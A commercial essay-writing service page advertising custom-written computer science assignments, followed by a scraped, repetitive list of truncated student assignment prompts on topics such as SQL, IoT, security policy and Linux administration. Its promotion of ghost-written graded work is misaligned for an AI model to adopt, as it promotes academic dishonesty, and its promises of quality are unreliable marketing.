Get help from the best in academic writing.
Computer Science Assignment Help Writers

Get Computer Science Assignment Help From Expert Writers

All Essays is focused on…Helping You Achieve More in your Computer Science Homework and Assignments.
We know how complicated it can be to write computer science assignments with proper content, references and format, especially when you’re on a deadline! Our experienced information systems and computer science writing professionals know how to properly research, compose, format and reference your paper.

Our Experienced Assignment Help Professionals

Our experienced essay writing professionals are experts in computer science. They help hundreds of students just like you in achieving remarkable grades through their original and custom written essays. Our essay writing professionals have access to 1000’s of quality research libraries and are fully aware of latest developments. Apart from our writers being highly qualified and holding first class degree in their respective fields, our writers are constantly trained and tested to ensure premium quality service is offered to our clients!

Essay Writing Help by AllEssays.Online

Essay writing for any academic level requires time, concentration, experience and resources! It does not matter whether you are a first-year college student or in the process of completing your PhD, it’s nearly impossible to write an essay which is thoroughly researched, properly structured and referenced unless you have the time and resources to master this skill. So why take a chance?

At All Essays, we specialize in providing professional academic essay writing service and we can write on all major subject areas, including the one’s you think are relatively new. We can do just that and more because of our in house research and development teams

.
The most brilliant theorists can be misunderstood if their work is not expressed clearly and concisely.

Our team of professional and experienced essay writers is first class graduates from English native-speaking countries working under the supervision of All Essays and strict quality control guidelines, that’s why we promise our Computer Science Assignment Help is plagiarism free!

Uniquely Tailored and Timely Delivered

Each essay is uniquely tailored (custom written) meeting the requirements you specify at the time of placing the order and delivered exactly when you want it! We are proud to have overwhelmed our clients by delivering before the deadline.

All you have to do is provide us with your essay requirements through the simple online order form and our experienced essay writing professionals will do their magic which will overwhelm you the moment you receive your essay.

Need Help With Computer Science Term Paper?

Are you struggling with writing a Term Paper?
Don’t have enough time to research and compose your Term Paper?
Already thinking about asking for an extension?

Don’t Panic. All Essays is here to save your day.

We know how complicated it can be to write a term paper with proper references and format, especially when you’re on a deadline! Our experienced term paper writing professionals know how to properly research, compose, format and reference your term paper.

Our Qualified Term Paper Writing Professionals

Our experienced term paper writing professionals are experts in your area of study. They help hundreds of students just like you in achieving remarkable grades through their original and custom written term papers. Our term paper writing professionals have access to 1000’s of quality research libraries and are fully aware of latest developments. Apart from our writers being highly qualified and holding first class degree in their respective fields, our writers are constantly trained and tested to ensure premium quality service is offered to our clients!

Term Paper Writing Help by Our Essay Wrting Service

Term paper writing for any academic level requires time, concentration, experience and resources! It does not matter whether you are a first-year college student or in the process of completing your PhD, it’s nearly impossible to write a term paper which is thoroughly researched, properly structured and referenced unless you have the time and resources to master this skill. So why take a chance?

AllEssays.online specializes in providing professional Computer Science Assignment Help Service and we can write on all major subject areas, including the one’s you think are relatively new. At AllEssays we can do just that and more because of our in house research and development teams

.
The most brilliant theorists can be misunderstood if their work is not expressed clearly and concisely.

Each term paper is uniquely tailored (custom written) meeting the requirements you specify at the time of placing the order and delivered exactly when you want it! We are proud to have overwhelmed our clients by delivering before the deadline.

When you decide to contract your work to one of our experienced writers, always expect the following:

  • Highly experienced and qualified writers. We keep the writing quality bar high. All of the papers completed by writers are authorized by our in-house editors before delivery. This helps us guarantee that only clean works with topic-relevant content are brought to you. What is more important, we scan each paper for plagiarism using Copyscape. It might sound like a bit of a process, but don’t worry. We will meet the deadline you picked.
  • Confidential: We ensure your privacy with solid privacy policies, We do not share your personal information and have adopted a direct interaction with your writer to give you maximum control over the process. This is an era of a boom in internet use and technology. Due to increases in innovations in information technology, users of the internet are faced with a number of One of them is a threat to their privacy. We are very sensitive to protecting your private information. At no given time will your private information be revealed to third party users without your consent.
  • Different writing services: There are a number of different writing services you will get from our company. One of them is dissertation writing. Obviously, coming up with a perfect dissertation is not an easy task. It requires extensive research, and you must have knowledge of the subject you are writing. You are required to collect primary and secondary data for your research. If you are stuck with your dissertation, bring it. You will get assistance. Other writing services you are likely to get from us are term paper writing, essay writing, annotations, report writing, etc.
  • Revisions: As a legitimate writing company, we allow for free revision services. We understand that in some instances, our writers may not follow your instructions while writing your paper. In case you receive such kind of paper, you have a right to ask for a free revision. Rest assured that your paper will be revised and produced within time.
  • Affordable: When you seek our writing service, you receive bids from top writers. Choose from various offers from writers to save and get the best quality work.

Well, these are the facts about our company. You want to know more! Write an email to us, or better still, contact us through chat. We are eager to work with you and write the dissertation paper that is giving you sleepless nights. For us to do that, you must order a paper from us.

To get help with your computer science homework or project, all you have to do is provide us with your term paper requirements through the simple online order form and our experienced term paper writing professionals will do their magic which will overwhelm you the moment you receive your term paper.

  • Bitcoin Forecasting with RNN Write a paper on forecasting Bitcoin with RNN Techniques In your whitepaper Provide an overview of forecasting - Bitcoin Forecasting with RNN Write a paper on forecasting Bitcoin with RNN Techniques In your whitepaper Provide an overview of forecasting Explains the merits of LSTM for forecasting Uses Kera to perform LSTM forecasting on the bitcoin data Compare LSTM vs ARIMA models for Bitcoin forecasting (optional) Write your conclusions and references References - https://colab.research.google.com/github/paulgureghian/Google_Colab_Notebooks/blob/master/Bitcoin_Price_Prediction.ipynb https://www.kaggle.com/humamfauzi/btc-price-prediction-using-lstm   Write atleast 4 pages in APA format. No plagiarism. On time delivery. NPV Template Net Present Value (NPV) Template Note: Cells B12:H12 and B16:H16 contain formulas to multiply discount factors * benefit and cost values Cells NPV Template Net Present Value (NPV) Template Note: Cells B12:H12 and B16:H16 contain formulas to multiply discount factors * benefit and cost values Cells I12 and I16 contain adjusted cost and benefit totals Cell C18 contains the calculation for net present value (NPV) Year Year Year Year Year Year Year Total 0 1 2 3 4 5 6 Benefits Factor PV of Benefits - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 Costs Factor PV of Costs - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 Net Present Value: - 0 The formula in cell C18 will calculate NPV when values are entered in cells B10:H11 and B14:H15 Sheet2 Sheet3 NPV Template Net Present Value (NPV) Template Note: Cells B12:H12 and B16:H16 contain formulas to multiply discount factors * benefit and cost values Cells NPV Template Net Present Value (NPV) Template Note: Cells B12:H12 and B16:H16 contain formulas to multiply discount factors * benefit and cost values Cells I12 and I16 contain adjusted cost and benefit totals Cell C18 contains the calculation for net present value (NPV) Year Year Year Year Year Year Year Total 0 1 2 3 4 5 6 Benefits Factor PV of Benefits - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 Costs Factor PV of Costs - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 Net Present Value: - 0 The formula in cell…

    Bitcoin Forecasting with RNN Write a paper on forecasting Bitcoin with RNN Techniques In your whitepaper Provide an overview of forecasting Read More »

  • ROI Template Return on Investment (ROI) Template Note: Cells C8:C14 and E8:E14 contain formulas to accumulate costs and benefits Cell C17 contains formula - ROI Template Return on Investment (ROI) Template Note: Cells C8:C14 and E8:E14 contain formulas to accumulate costs and benefits Cell C17 contains formula to calculate ROI Year Costs Cumulative Benefits Cumulative Costs Benefits 0 - 0 - 0 1 - 0 - 0 2 - 0 - 0 3 - 0 - 0 4 - 0 - 0 5 - 0 - 0 6 - 0 - 0 - 0 - 0 ROI: 0.0% The formula in cell C17 will calculate ROI when values are entered in cells B8:B14 and D8:D14 Sheet2 Sheet3 Under Formulating Your Brief, Kirk (2019) presented the list of roles or “hats” of data visualization design.  In 2012, the Under Formulating Your Brief, Kirk (2019) presented the list of roles or “hats” of data visualization design.  In 2012, the author presented the same topic but with a total of 8 “hats”.  After reading the information from 2012 (his discussion and the slide presentation he includes), compare the information discussed in our text.  Please provide your perspective why there is a change from 2012 to 2019.  This perspective would be your own opinion. This would not be research discovered about the differences from another source.  Please include the following: 1. What are the similarities and the differences in these two lists of roles? 2. Why do you think the list has been refined to the list presented in 2019? 3. What is your suggestion for the next revision and why? Assignment Content     This week you will consider supporting Great Day Fitness Tracking in the age of big data and Assignment Content     This week you will consider supporting Great Day Fitness Tracking in the age of big data and the capabilities and potential benefits of using business intelligence. Consider the overall use of information systems, including BI applications in support of decision-making and marketing. Create a 2- to 3-page report in Microsoft® Word to explain to Karen about this technology, specifying how business intelligence can use data collected from business applications to improve Great Day Fitness Tracking’s competitiveness. Format your assignment according to APA guidelines. Essay:    Many…

    ROI Template Return on Investment (ROI) Template Note: Cells C8:C14 and E8:E14 contain formulas to accumulate costs and benefits Cell C17 contains formula Read More »

  • In this assignment, you will design the tables to hold data in the CSVs, import the CSVs into a SQL Computer Science Assignment Help - In this assignment, you will design the tables to hold data in the CSVs, import the CSVs into a SQL database, and answer questions about the data. In other words, you will perform: Data Engineering Data Analysis Note: You may hear the term "Data Modeling" in place of "Data Engineering," but they are the same terms. Data Engineering is the more modern wording instead of Data Modeling. Data Modeling Inspect the CSVs and sketch out an ERD of the tables. Feel free to use a tool like http://www.quickdatabasediagrams.com. Data Engineering Use the information you have to create a table schema for each of the six CSV files. Remember to specify data types, primary keys, foreign keys, and other constraints. For the primary keys check to see if the column is unique, otherwise create a composite key. Which takes to primary keys in order to uniquely identify a row. Be sure to create tables in the correct order to handle foreign keys. Import each CSV file into the corresponding SQL table. Note be sure to import the data in the same order that the tables were created and account for the headers when importing to avoid errors. Data Analysis Once you have a complete database, do the following: List the following details of each employee: employee number, last name, first name, sex, and salary. List first name, last name, and hire date for employees who were hired in 1986. List the manager of each department with the following information: department number, department name, the manager's employee number, last name, first name. List the department of each employee with the following information: employee number, last name, first name, and department name. List first name, last name, and sex for employees whose first name is "Hercules" and last names begin with "B." List all employees in the Sales department, including their employee number, last name, first name, and department name. List all employees in the Sales and Development departments, including their employee number, last name, first name, and department name. In descending order, list the frequency count of employee last names, i.e., how…

    In this assignment, you will design the tables to hold data in the CSVs, import the CSVs into a SQL Computer Science Assignment Help Read More »

  • Define IoT and list the major characteristics of IoT – Dicussion - Question: Define IoT and list the major characteristics of IoT I am aware that all students have a Grammarly account. I, therefore, request you all to use Grammarly to check your paper before you upload it to iLearn; failing to do so will cause you to lose some points. The essence of doing this is to ensure that your paper is free from grammatical errors, conjugation, and spellings. A quality post is more than stating, “I agree with you.” Maybe you should state why you agree with your classmate’s post. Additionally, post some examples or find a related topic on the Internet or University’s library and comment on it in the discussion post. Reference: Sharda, R., Delen, Dursun, and Turban, E. (2020). Analytics, Data Science, The manager of the web development company introduced in Week 1 has asked you for As a response, you have decided to create an IT-based executive level presentation and executive summary that identifies key points on how Software as a Service (SaaS), Platform as a Service (PaaS), and Infrastructure as a Service (IaaS) could be used to gain a greater technological advantage for their organization. one page    Explore some of the current methodologies in Software Engineering. Choose one you are interested in and present it in one page    Explore some of the current methodologies in Software Engineering. Choose one you are interested in and present it in details. When you explain it, you should explain the methodology and how it relates to the classic waterfall model, and list the advantages and disadvantages of this methodology. Feel free to include images as well as videos in your presentation, making sure to document the source. Please note it is your responsibility to refer to reliable resources. You should create one Java file for each problem and save them all in one folder. Compress the folder as You should create one Java file for each problem and save them all in one folder. Compress the folder as a .zip file and submit it here. Please name your .zip file as P5-Last Name-First Nam.zip. For example, P5-Smith-John.zip.…

    Define IoT and list the major characteristics of IoT – Dicussion Read More »

  • Evidence Collection Policy Scenario After the recent security breach, Always Fresh decided to form a computer security incident response team (CSIRT). As - Evidence Collection Policy Scenario After the recent security breach, Always Fresh decided to form a computer security incident response team (CSIRT). As a security administrator, you have been assigned the responsibility of developing a CSIRT policy that addresses incident evidence collection and handling. The goal is to ensure all evidence collected during investigations is valid and admissible in court. Consider the following questions for collecting and handling evidence: 1. What are the main concerns when collecting evidence? 2. What precautions are necessary to preserve evidence state? 3. How do you ensure evidence remains in its initial state? 4. What information and procedures are necessary to ensure evidence is admissible in court? Tasks Create a policy that ensures all evidence is collected and handled in a secure and efficient manner. Remember, you are writing a policy, not procedures. Focus on the high-level tasks, not the individual steps. Address the following in your policy: ▪ Description of information required for items of evidence ▪ Documentation required in addition to item details (personnel, description of circumstances, and so on) ▪ Description of measures required to preserve initial evidence integrity ▪ Description of measures required to preserve ongoing evidence integrity ▪ Controls necessary to maintain evidence integrity in storage ▪ Documentation required to demonstrate evidence integrity Required Resources ▪ Internet access  ▪ Course textbook Submission Requirements  ▪ Format: Microsoft Word (or compatible)
 ▪ Font: Roman, size 12, double-space
 ▪ APA Citation Style ▪ Length: 2 to 4 pages 700 word discussion: What is a project, and what are its main attributes? What is a project, and what are its main attributes? How is a project different from what most people do in their day-to-day jobs? Discuss the importance of top management commitment and the development of standards for successful project management. Provide examples to illustrate the importance of these items based on your experience on any type of project. Discuss the unique challenges that an IT project presents. Read three articles and discuss the principle of least privilege in at least 500 words. Explain how this principle impacts data security. Read three articles and…

    Evidence Collection Policy Scenario After the recent security breach, Always Fresh decided to form a computer security incident response team (CSIRT). As Read More »

  • ackground: According to Kirk (2016), typography will have a significant role in your visualizations. You have to be careful with - ackground: According to Kirk (2016), typography will have a significant role in your visualizations. You have to be careful with your text, but you must also be concerned with how the text looks. This then leads to color and functional harmony. You must provide the balance of colors in your visualizations (Kirk, 2016).  The harmony of colors you select during design will impact many aspects of the overall visualization. Assignment: Write a research paper that contains the following: Discuss Typography and the importance of appearance of text Discuss the following color harmonies: (Usage, Pros, and Cons) Complementary colors Analogous colors Triadic colors Your research paper should be at least 3 pages (800 words), double-spaced, have at least 4 APA references, and typed in an easy-to-read font in MS Word (other word processors are fine to use but save it in MS Word format). Your cover page should contain the following: Title, Student’s name, University’s name, Course name, Hello, i need this paper by 07/29 afternoon. Strictly No plagiarism please use your own words. Discuss  500 words or more discuss why Hello, i need this paper by 07/29 afternoon. Strictly No plagiarism please use your own words. Discuss  500 words or more discuss why Security as a Service is a good investment. Use at least three sources.  Use the Research Databases available from the Danforth Library (https://libguides.nec.edu/az.php)not Google. Include at least 3 quotes from your sources enclosed in quotation marks and cited in-line by reference to your reference list.  Example: "words you copied" (citation) These quotes should be one full sentence not altered or paraphrased. Cite your sources using APA format. Use the quotes in your paragaphs.  Stand alone quotes will not count toward the 3 required quotes. Copying without attribution or the use of spinbot or other word substitution software will result in a grade of 0.  Write in essay format not in bulleted, numbered or other list format.  https://www.youtube.com/watch?v=1iRUf_dIGXM https://www.youtube.com/watch?v=V_urWnHgYGk https://www.youtube.com/watch?v=11lxvi6a0Bw Strictly No plagiarism Hello, i need this paper by 07/29 afternoon. Strictly No plagiarism please use your own words. Propose and defend a topic for your Hello, i need this paper by 07/29 afternoon. Strictly No…

    ackground: According to Kirk (2016), typography will have a significant role in your visualizations. You have to be careful with Read More »

  • What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also - What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also provide protection for mobile devices? If you do use a VPN, which one and why did you select that particular one?  The post should be in a 750-word limit. must and should be in APA format with references and citations. Plagiarism free. For this assignment, you will need to perform a quantitative analysis of the below scenario.  Please write your response in For this assignment, you will need to perform a quantitative analysis of the below scenario.  Please write your response in a brief APA formatted report. Quantitative Analysis You are the manager of desktop support for NASA.  You are responsible for purchasing and managing all of the laptops NASA distributes to employees.  There are 700 laptops currently in service.  All of the laptops randomly leave the building and serve a mobile workforce.  Read the following articles your CIO brought to you for consideration: http://www.pcworld.com/article/251318/48_nasa_laptops_stolen_in_two_years_a_case_for_better_encryption_practices.html http://www.pcworld.com/article/181124/laptops_that_go_ghost.html Compute the SLE, ARO, ALE and safeguard value based on the information in these articles for a report your CIO plans to submit as a solution.  For the safeguard value, find and price an appropriate physical and software solution(s) to safeguard theft and data loss.  Once you pick a product, include a link to the page for pricing and item description.  Present the realized savings in your report and the benefits of the solution you choose for safeguarding the laptops.  Don’t forget to include your equations for ARO, ALE, safeguard value and realized savings calculations. This is a question you should (and will be) asking yourself as you take on a security officer role. Quite honestly, This is a question you should (and will be) asking yourself as you take on a security officer role. Quite honestly, this statement could become your undoing if you do not think it through or try to avoid answering such a question; however, the extreme "voice of doom" is not one you will be visiting very often. You should be evaluating the possible circumstances and ask yourself the above question as…

    What are the main reasons why a VPN is the right solution for protecting the network perimeter? Do they also Read More »

  • Topic: Enterprise Risk Management **Look at the attachment on how the paper has to be written ** In order to complete this - Topic: Enterprise Risk Management **Look at the attachment on how the paper has to be written ** In order to complete this program, you will need to do research. One of the more useful tools in conducting research is the annotated bibliography.  An annotated bibliography combines the citations found in the References list at the end of documents in APA format with annotations about each of the sources.  For this final assignment, you will construct an annotated bibliography to help build your personal citation "database" to use as your move forward and (hopefully) for your dissertation.  Take this time to start on the right foot and be prepared when the time comes.  You should have a general ideal of your research topic, if not, take this time to think about what area you want to do research and find article to help shape that path.   Purpose:  An annotated bibliography is an organizing tool that is helpful when working on a research project.  An effective annotated bibliography is used to compile research sources in one location and provide the researcher with quick access to the information contained in each source.  Audience: This assignment should be directed at your scholarly peers, and you may assume that they have only a casual familiarity with your topic or issue. Content/Subject: Your annotated bibliography will consist of the sources that you have deemed relevant to your topic and/or question(s) of inquiry.  While you may encounter sources that are not relevant or do not fit the scope of your project while researching, for the purposes of this assignment, you will only include the ones that you find useful and relevant.  Cite the source in proper APA format.  The citations should be organized in alphabetical order by author just as in an APA References page.  Follow with a brief annotation that summarizes the source (approx. 100-150 words). You may NOT quote from the source; Ideally, all of the annotation should be in your own words.  In 1 or 2 sentences, explain the source’s relevance and importance to your issue. Constraints:  The annotated bibliography is a fairly rigid genre.  Your citations must adhere…

    Topic: Enterprise Risk Management **Look at the attachment on how the paper has to be written ** In order to complete this Read More »

  • Write a 700- to 1,400-word summary that interprets the results of your survey. Apply the results to your personal and professional Computer Science Assignment Help - Write a 700- to 1,400-word summary that interprets the results of your survey. Apply the results to your personal and professional development. Include the following: Interpret the results of your survey. Use the information provided in your survey results to describe your ethics style and what your style means to you. Explain the results of your survey. Were you surprised by your results? Do you agree or disagree with the outcome? Explain why. Evaluate the role and importance of personal ethics in the field of psychology, the development of principles, and the code of conduct. Identify how your ethics style affects how you will apply psychological principles to personal, spiritual, social, and organizational issues. Discuss how ethics affect psychological knowledge and principles related to personal growth, health, and development. Analyze the advantages of choosing to pursue a degree in psychology. How do ethics play a role in your decision? Provide examples. Include an introduction, conclusion, and references page Scenario Always Fresh wants to ensure its computers comply with a standard security baseline and are regularly scanned for vulnerabilities. You Scenario Always Fresh wants to ensure its computers comply with a standard security baseline and are regularly scanned for vulnerabilities. You choose to use the Microsoft Security Compliance Toolkit to assess the basic security for all of your Windows computers and use OpenVAS to perform vulnerability scans. Tasks Develop a procedure guide to ensure that a computer adheres to a standard security baseline and has no known vulnerabilities. For each application, fill in details for the following general steps: 1. Acquire and install the application. 2. Scan computers. 3. Review scan results. 4. Identify issues you need to address. 5. Document the steps to address each issue. Scenario One of the security improvements at Always Fresh is setting up a system recovery procedure for each type of computer. These procedures will guide administrators in recovering a failed computer to a condition as near to the point of failure as possible. The goal is to minimize both downtime and data loss. You have already implemented the following backup strategies for workstation computers: § All…

    Write a 700- to 1,400-word summary that interprets the results of your survey. Apply the results to your personal and professional Computer Science Assignment Help Read More »

  • The control of processes and threads is of deep concern by developers - Question Get Answer The control of processes and threads is of deep concern by developers of all operating systems capable of handling "real or emulated" simultaneous computer activity. Threads are typically created by processes (initially invoked by the user or another process). Discuss how an operating system manages these processes and threads, how they are instantiated and discarded, how the activity is controlled, along with the respective advantages and disadvantages of both process and thread. Do not discuss MS Windows OS. Instead, you may choose from Linux, UNIX, ROS, z/OS, or VM. Consider the following business rules for a patient appointment system.........A Question Get Answer Consider the following business rules for a patient appointment system.........A doctor can be scheduled for many appointments, but may not have any scheduled at all. Each appointment is scheduled with exactly 1 doctor. A patient can schedule 1 or more appointments. One appointment is scheduled with exactly 1 patient. An appointment must generate exactly 1 bill, a bill is generated by only 1 appointment. One payment is applied to exactly 1 bill, and 1 bill can be paid off over time by several payments. A bill can be outstanding, having nothing yet paid on it at all. One patient can make many payments, but a single payment is made by only 1 patient. Some patients are insured by an insurance company. If they are insured, they can only carry insurance with one company. An insurance compnay can have many patients carry their policies. For patients that carry insurance, the insurance company will make payments, each single payment is made by exactly 1 insurance company.business rules for a patient appointment system......According to the information:1 identifies the entities,2 attributes of entities,3cardinality of entities,4 degree of relationship and types of relationship b/w entities.Also table the diagram with suitable words 1.1 How to keep data in synch across regions? 1 point Question Get Answer 1.Question 1 How to keep data in synch across regions? 1 point Cloud SQLCloud BigtableCloud DatastoreCloud Storage2.Question 2An existing application uses websockets. To help migrate the application to cloud you should:1 pointRedesign the application to…

    The control of processes and threads is of deep concern by developers Read More »

  • 1.  BCP Scope – Submit a brief description for feedback (one page or less) of the topic areas to be - 1.  BCP Scope - Submit a brief description for feedback (one page or less) of the topic areas to be covered in the BCP. 2.  Business Impact Analysis – use template  3.  Key Resources and Stakeholders – use template 4.  Preventive Controls List - write a description of the preventative controls that you considered in the previous step 5.  Viable Recovery Strategies - to create a drawing or descriptive list that follows both options to each decision of "yes" or "no" or "success" or "failure" to the reconstructive effort. 6.  Contingency Plan – steps 9 thru 11 7.  Business Continuity Plan 5-7 pages Assignment 650 to 700 words APA Format, need References As Fennelly (2017:279-282) noted, glass-windows tend to play a health-giving role by allowing Assignment 650 to 700 words APA Format, need References As Fennelly (2017:279-282) noted, glass-windows tend to play a health-giving role by allowing sunlight, visibility and ventilation into a building and making the structure a healthy facility. Using up-to-date and innovative technology often contributes to a relaxed, healthy and healthy standard of living in any community. If you are inspired and in agreement with author Fennelly, use your physical security expertise to provide well-synthesized descriptions on the importance of glass-windows and contribution to relaxed and healthy standard of living in any community. Indicate which of these categories of five glass-windows will satisfy the “relaxed and healthy standard of living in any community:” laminated, sheet, tempered, bullet-resistant and float glasses. Please Read the Instructions Carefully in the body of this post and in the Project 7.docx files attached below. Also Attached Please Read the Instructions Carefully in the body of this post and in the Project 7.docx files attached below. Also Attached  the required ppt slides and textbook for reference Discussion-1 400  words minimum (topic : Firewall Selection   ): APA Format, need References Assume you are a security professional for an educational institution with 10 servers. Researchers on campus push a lot of traffic over the network, which slows performance at times. You also have a limited budget. You are evaluating both stand-alone and embedded firewalls in…

    1.  BCP Scope – Submit a brief description for feedback (one page or less) of the topic areas to be Read More »

  • This assignment will help you research and understand what impact organizational structure and communication have on organizational behavior within an - This assignment will help you research and understand what impact organizational structure and communication have on organizational behavior within an organization. As you complete this assignment, consider experiences you have had with organizational structure and communication. Write a 350- to 700-word paper in which you:  Explain how organizational structure affects organizational behavior. Identify how effective and ineffective application of structure impacts organizational behavior. Discuss how organizational communications can be used to support organizational behavior. Include effective and ineffective communication methods. Focus on empowering leadership and effective collaboration in geographically dispersed teams, please answer the following questions: How do geographically Focus on empowering leadership and effective collaboration in geographically dispersed teams, please answer the following questions: How do geographically dispersed teams collaborate effectively? Please find at least three tools on the market that teams can use to collaborate on a geographically dispersed team.  Please note the pros and cons of each tool.  Based on the research above, note which tool you would select if you were managing the geographically dispersed team and why. Google Scholar is a great source for research.  Please be sure that journal articles are peer-reviewed and are published within the last five years. The paper should meet the following requirements: 3 pages in length (not including title page or references) APA guidelines must be followed.  The paper must include a cover page, an introduction, a body with fully developed content, and a conclusion. A minimum of five peer-reviewed journal articles. The writing should be clear and concise.  Headings should be used to transition thoughts.  Don’t forget that the grade also includes the quality of writing. Information technology security policies are the foundation upon which an organization builds good security habits.  IT security policies define what Information technology security policies are the foundation upon which an organization builds good security habits.  IT security policies define what business and technology risks will be controlled.  Will-implemented security policies build brand confidence and help an organization achieve its goal.   1. What technical and/or nontechnical barriers do YOU foresee in YOUR organization when it comes to implementing IT security policies? WRITTEN…

    This assignment will help you research and understand what impact organizational structure and communication have on organizational behavior within an Read More »

  • See the attached questions. and book  1) Create a new thread. As indicated above, create a new thread, choose a use case from section - See the attached questions. and book  1) Create a new thread. As indicated above, create a new thread, choose a use case from section III, and a risk for adoption from section IV. Describe a real blockchain-based product that implements your chosen use case and how your chosen risk could impact the project’s success. Then think of three questions you’d like to ask other students and add these to the end of your thread. The questions should be taken from material you read or videos you watched from this week’s assigned activities. You’re not trying to test each other, but you are trying to start a discussion. 2) Select AT LEAST 3 other students' threads and post substantive comments on those threads. Your comments should answer AT LEAST one of the questions posed in the thread and extend the conversation started with that thread. Make sure that you include the question in your comment so I can see what question you’re answering. Evidence Collection Policy Scenario After the recent security breach, Always Fresh decided to form a computer security incident response team (CSIRT). As Evidence Collection Policy Scenario After the recent security breach, Always Fresh decided to form a computer security incident response team (CSIRT). As a security administrator, you have been assigned the responsibility of developing a CSIRT policy that addresses incident evidence collection and handling. The goal is to ensure all evidence collected during investigations is valid and admissible in court. Consider the following questions for collecting and handling evidence: 1. What are the main concerns when collecting evidence? 2. What precautions are necessary to preserve evidence state? 3. How do you ensure evidence remains in its initial state? 4. What information and procedures are necessary to ensure evidence is admissible in court? Tasks Create a policy that ensures all evidence is collected and handled in a secure and efficient manner. Remember, you are writing a policy, not procedures. Focus on the high-level tasks, not the individual steps. Address the following in your policy: ▪ Description of information required for items of evidence ▪ Documentation required in addition to item details (personnel, description of circumstances,…

    See the attached questions. and book  1) Create a new thread. As indicated above, create a new thread, choose a use case from section Read More »

  • Make a program: All guests in ABC Hotel are either Elite members meaning they get a free breakfast) or Standard - Make a program: All guests in ABC Hotel are either Elite members meaning they get a free breakfast) or Standard members (meaning they do not get a free breakfast). They collect points for every stay-Elite members earn 100 points for every day stayed in the hotel (so 2 days would be 200 points) and Standard member earn 50 points for every stay (so 3 days would be 140 points). Once 1000 points are reached, guests get a free stay. Guest details are kept in a file: Sample input file 1: Augustus, E-300,200,eggs//customer name, Membership level (E means elite), item ordered, ID number, points, breakfast choice Sample input file 2: Cyrus, S-100,30,X//customer name, Membership level (S means standard), item ordered, ID number, points ,breakfast choice 1. The program should read in the number of points to get a free stay (1000) from the command line. It should continuously read in files of guests until exit is entered (meaning the user can keep typing in file names-note that you can type in the same file name to open a previous guest). 2. Every time a file is opened, the program should ask how many days the guest is staying and award the appropriate number of points based on the membership level. The new point total should be saved in the file. If they are an elite member, they have the chance to change their breakfast choice. 3. When exiting, a file should be output with the number of guests that got a free stay (meaning their total points were 1000 or greater) Sample output file: Augustus had free stay, Jane had a free stay. 4. You should make a Hotel class and an abstract Person class. You should also make additional classes as necessary. Automatic O if you do not put a majority of the functionality in classes-DO NOT PUT EVERYTHING IN MAIN. Note that part of your grade will come from you putting the correct functionality in the correct class. For example, you had a Customer class and a Restaurant class, you should put the functionality of ordering food in the…

    Make a program: All guests in ABC Hotel are either Elite members meaning they get a free breakfast) or Standard Read More »

  • Team Case Study Paper on KFC This is a team assignment and students are expected to work together and synthesize their Computer Science Assignment Help - Team Case Study Paper on KFC This is a team assignment and students are expected to work together and synthesize their individual parts to produce one (1) paper.  Only one (1) student on each team needs to submit the paper for grading.  Each team member will receive the team's grade.  Refer to the file on "Conducting a Case Study" and the Case Study Rubric.  It is imperative to follow the criteria listed in the Case Study Rubric, "Conducting a Case Study" Guidelines, and the 6th edition of the APA Manual.  This assignment should be 15-20 pages excluding the title and reference pages.  The paper should contain at least one graph, figure, chart, or table. Be sure to follow the Case Study Rubric and follow APA guidelines. PowerPoint presentation of KFC.  The presentation should contain a minimum of 15 slides. The main goal of any business communication is to determine what message needs to be delivered, and how to deliver The main goal of any business communication is to determine what message needs to be delivered, and how to deliver it clearly and concisely to the intended audience. In your post, explore how we identify what message needs to be delivered to the intended audience, and what methods we should employ to deliver the message concisely and with the highest level of clarity. Good day! Please review the items listed below. Please, review before accepting the bid. Plagiarism will be checked. Thanks for your Good day! Please review the items listed below. Please, review before accepting the bid. Plagiarism will be checked. Thanks for your assistance. Part 1:    Quality Management and Quality Assurance You have been hired for a newly created quality management position at Funzo, Inc. Funzo is a large toy manufacturer that has recently started experiencing problems with their largest action figure line. Some of the problems include incorrect accessories being packaged with figures, arms and shoulders being put on incorrectly, packaging not being sealed, and action features not working correctly. The owner of Funzo has asked you to discuss some of your ideas for correcting these problems. Using…

    Team Case Study Paper on KFC This is a team assignment and students are expected to work together and synthesize their Computer Science Assignment Help Read More »

  • Need a detailed step by step answer for the following case scenario: - Question Need a detailed step by step answer for the following case scenario: Case ScenarioAs the Linux Administrator for fast-growing company, you have been tasked with creating, modifying, and removing user accounts from the Linux server. The company has just hired 9 new employees to fill 3 newly designed departments. The departments that have been created are Engineering, Sales and IS. The server must be setup with the appropriate files, folders, users, groups and permissions to ensure a successful launch of the newly designed departments.Need a directory at the root (/) of the file system for each department. This name should reflect the department name that will use the directory.Needs a group for each department. This name should reflect the department name that the group will be assigned.Needs an administrative user for each of the departments.o The user will have a Bash login shello The user will belong to the respective group for each department. This will need to be the user's primary group. · Create two additional users for each department.o The users will have a Bash login shell.o The users will belong to their respective group for each department. This will need to be the user's primary group.For security reasons, the following modifications will need to be made to each of the departments' respective directories: Ensure that the owner of each of the directories is the department administrator and the group ownership is the group for each department. o The department administrator will have full access to their respective department directories.Ensure that only the owner of a file in the department's directory can delete the file. The user will also have ownership of their respective department folders.Normal users in each department will have full access (Read, Writ and Execute) to their respective department folders.The department folders will ONLY be accessible by users/administrators in each of the respective departments. Ensure that no one else will have permissions to the folders.DeliverablesUse the appropriate command to verify each user and group has been created.Use the appropriate command to verify each user's group assignment.Use the appropriate command to verify the directory creation…

    Need a detailed step by step answer for the following case scenario: Read More »

